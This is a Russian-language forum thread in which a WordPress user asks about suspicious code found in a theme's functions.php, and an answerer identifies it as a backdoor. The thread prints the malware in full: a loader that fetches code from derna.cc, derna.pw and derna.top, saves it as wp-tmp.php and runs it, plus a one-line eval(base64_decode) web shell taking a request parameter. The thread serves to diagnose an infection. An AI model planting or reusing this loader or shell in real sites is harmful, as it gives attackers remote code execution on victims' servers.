Что означает этот кусок кода в functions.php?

Question

[Сергей Крам]

WordPress. При помощи плагина который ищет проблемные запросы к БД, нашел вот такие странные строки в functions.php шаблона.
В PHP я не силен, но смущает адрес какого-то сайта в функшн.
Похоже на какую-то гадость зашитую в шаблон.

$wp_auth_key='тут-находится-некий-ключ';
if (($tmpcontent = @file_get_contents("www.derna.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("www.derna.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}


elseif ($tmpcontent = @file_get_contents("www.derna.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif (($tmpcontent = @file_get_contents("www.derna.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("www.derna.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}
}
}

Comments

[alex-1917]

сноси плагин, а лучше весь сайт, пока тебя хостеры не заблочили

[Roman]

что с тобой не так если ты не можешь нормально вставить код?

Answer 1

[pool]

Скачивается код с одного из 3 вредоносных сайтов и сохраняется в файл wp-tmp.php:

<?php
$p = $_REQUEST["m"];
eval(base64_decode($p));
?>

это бэкдор

Comments

[alex-1917]

ахахах, достойное наказание для любителей ворованных плагинов

Answer 2

[cikavosti]

Та же проблема. Но не понял, что с этим делать? Удалить с файла functions.php часть вредоносного кода?

Comments

[Сергей Крам]

Как временное решение, удалить часть, относящуюся к вредоносному коду и выставить минимальные права на файл.